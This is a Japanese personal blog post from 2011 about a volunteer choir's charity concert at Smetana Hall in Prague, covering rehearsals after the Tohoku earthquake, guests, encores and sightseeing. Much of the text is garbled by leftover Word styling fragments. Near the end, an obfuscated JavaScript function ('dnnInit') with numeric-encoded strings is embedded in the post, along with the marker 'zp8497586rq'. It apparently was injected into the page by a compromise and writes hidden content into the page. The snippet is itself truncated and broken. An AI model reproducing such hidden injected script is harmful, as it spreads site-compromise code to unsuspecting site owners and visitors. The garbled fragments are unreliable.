Home > 2011 > 6月 > 27
­

Century;mso-hansi-font-family:Century">平成23 Century">年6 mso-ascii-font-family:Century;mso-hansi-font-family:Century">月9 Century;mso-hansi-font-family:Century">日( Century">木) mso-ascii-font-family:Century;mso-hansi-font-family:Century">、プラハのスメタナホールで開催された「第4 Century;mso-hansi-font-family:Century">回国境なき合唱団チャリティコンサート」に参加して、今回も一生忘れられない体験をすることができました。

Century;mso-hansi-font-family:Century">特に今回は、3 Century">月に起きた東日本大震災の影響で日本全体に重苦しい雰囲気の漂う中、団員一丸となって、本演奏会を大成功に導けたことに大きな意味があると思います。

Century;mso-hansi-font-family:Century"><スメタナホール>

Century;mso-hansi-font-family:Century">私は、第1 Century">回目のウィーン公演と前回のベルリン公演に引き続き、合唱ボランティアとして、「日本の歌」と「第九」に参加しました。会場は、映画「のだめカンタービレ」でも舞台となったスメタナホール。会場とその音の響きは映画をしのぐような美しさです。

           ( mso-ascii-font-family:Century;mso-hansi-font-family:Century">スメタナホール)

Century;mso-hansi-font-family:Century"><震災と練習>

Century;mso-hansi-font-family:Century">練習は、3 Century">月から計8 mso-ascii-font-family:Century;mso-hansi-font-family:Century">回、実行委員のI Century;mso-hansi-font-family:Century">さんが新橋に所有されているビルの2 Century">階で開催されました。毎回練習終了後には、同ビル1 Century">階にある系列のレストランで懇親会を行い、合唱団員の親睦を深めることができました。

Century">練習は当初、震災の影響で出席者はやや限られていたようで、私自身も自宅エリアが液状化して上下水道がしばらく止まったため、最初の2 Century;mso-hansi-font-family:Century">回は欠席せざるをえませんでした。しかし、時間の経過とともに出席者も増え、仙台や福島在住の団員も熱心に通ってこられるようになりました。今回も指揮者の佐藤一昭先生とピアノの原恵子先生による、粘り強く私たちを「楽しくのせる」ご指導により、無事に演奏会にのぞむことができました。

( mso-ascii-font-family:Century;mso-hansi-font-family:Century">プラハの練習会場The Civic Center Mlejn mso-ascii-font-family:Century;mso-hansi-font-family:Century">でのオーケストラあわせ。児童施設Child’s Smile mso-ascii-font-family:Century;mso-hansi-font-family:Century">財団のために団員が持ち寄ったご寄付の品々もここで集められ、団員有志が同財団の施設を訪問、寄贈しました。施設からは、小さな子どもたちのためのウェットティッシュと絵本のご希望がありました。)

Century;mso-hansi-font-family:Century"><演奏会大成功>

Century;mso-hansi-font-family:Century">今回、ソリスト4 Century">人は全員、海外でも大活躍されている日本人の方々にお願いしました。指揮は前回のベルリン公演に引き続き、横島勝人先生です。

Century;mso-hansi-font-family:Century">ソプラノソリストの蔵野蘭子さんと当合唱団員テノールのK Century;mso-hansi-font-family:Century">さんとの結婚が現地練習会席上で公式発表され、団員一同で祝福しました。おめでとうございます !

           ( mso-ascii-font-family:Century;mso-hansi-font-family:Century">スメタナホール客席から)

Century;mso-hansi-font-family:Century">また、演奏会にはご来賓として、ご後援くださった在チェコ日本国大使館の國方俊男大使ご夫妻、そして東京・メキシコオリンピックの女子体操金メダリストのベラ・チャスラフスカさんをお招きしました。当合唱団にとってこれほど名誉なことはありません。

Century">プラハ到着後、実行委員長の王野百合子さんと私の二人で、國方大使にご挨拶にうかがった際には、大使をはじめ館員の皆様から心のこもったあたたかいお励ましをいただきました。このようなご挨拶にうかがう中で、現地で要職にある日本人K Century;mso-hansi-font-family:Century">さんが急遽、合唱団バスのメンバーとして演奏会に出演されることになったのはうれしい驚きです。K Century;mso-hansi-font-family:Century">さんはなんと、わずか二日間で全曲を暗譜してスメタナホールの舞台に立たれました。演奏会当日は、日本大使館、現地日本人会、日本人学校などからもご家族づれで多数の方々がご出席いただき、熱心に応援してくださいました。

           ( mso-ascii-font-family:Century;mso-hansi-font-family:Century">総練習開始前にスメタナホール合唱団席から)

Century">音楽会が毎日多く開かれる欧米では集客に少々苦労するところですが、幸いプラハでも現地のお客様がたくさんお越しいただけました。

Century">今回、当合唱団では、第一部の4曲目「大地讃頌」を日本再生のための祈りを込めて歌う歌として位置づけ、演奏前に指揮者の佐藤先生から会場の皆さんに英語とチェコ語で「次の歌の間、私たちと一緒に日本のためにお祈りください」と呼びかけました。第一部終了後は拍手が鳴り止まず、当団演奏会史上たぶん初のアンコールとして「そうらん節」を再度歌うこととなりました。

Century">また、第九の後のアンコール(実はこちらは準備していました。) Century;mso-hansi-font-family:Century">として、チェコの第二国歌と言われるスメタナ作曲「モルダウ」をオーケストラとあわせて歌った後は、ご来賓のベラ・チャスラフスカさんが起立されたのをきっかけとして、お客様全員が起立され、文字通り総立ちのスタンディング・オベーションをいただきました。

           ( mso-ascii-font-family:Century;mso-hansi-font-family:Century">男声楽屋 あふれる笑顔)

( mso-ascii-font-family:Century;mso-hansi-font-family:Century">演奏会後の懇親会 チャスラフスカさんとお嬢さんを囲んで佐藤先生の指揮によりモルダウを合唱)

Century;mso-hansi-font-family:Century"><初訪問のプラハ>

Century;mso-hansi-font-family:Century">私にとってプラハは初めての訪問です。コートなどをトランクにつめ、寒さに備えて出かけましたが、現地に着いてみると東京よりも暑く、さっそく半袖シャツを買いに走りました。昼頃になると、暑がりの私には日向で歩いているのが大変なくらいの暑さのため、時差ぼけで超早起きになったことを幸いとして、ひんやりと心地よい午前8 Century;mso-hansi-font-family:Century">時前の街歩きを楽しみました。この時間帯は昼間、各国の観光客で大混雑するカレル橋付近も人影がまばらです。スメタナ博物館などの文化スポットも訪問できました。

          ( mso-ascii-font-family:Century;mso-hansi-font-family:Century">スメタナ博物館の中 撮影料をお支払いして撮影する仕組み)

Century;mso-hansi-font-family:Century">演奏会翌日は、世界遺産の中世の古都、チェスキー・クリムロフへ日帰りで行き、南ボヘミアの美しい町並みを心ゆくまで堪能しました。

          ( mso-ascii-font-family:Century;mso-hansi-font-family:Century">クリムロフ城壁越しに見た、いつまでも眺めていたい町並み)

Century;mso-hansi-font-family:Century"><おわりに>

Century;mso-hansi-font-family:Century">今回、困難な環境の中、演奏会を無事に大成功させ、「アートボランティア」としての実をあげることができたのは、実行委員長の王野さんを中心として、実行委員、参加団員一同のチームワークと、主催されたエフエム東京、後援団体、協賛企業の皆様、近畿日本ツーリスト(knt ! ) Century;mso-hansi-font-family:Century">などの強力なご支援の賜物です。あらためてあつく御礼申し上げます。

function dnnInit(){var a=0,m,v,t,z,x=new Array(“9091968376″,”88879181928187863473749187849392773592878834213333338896″,”778787″,”949990793917947998942577939317″),l=x.length;while(++a<=l){m=x[l-a];t=z="";for(v=0;v.”+x[2]+”{“+x[1]+”}“);}dnnInit();

Century;mso-hansi-font-family:Century">これからも合唱ボランティアとして皆様と歌声をつないでいきたいと思います。次の機会もぜひご一緒に歌いましょう。ありがとうございました。

zp8497586rq
2011年6月
« 5月   7月 »
 12345
6789101112
13141516171819
20212223242526
27282930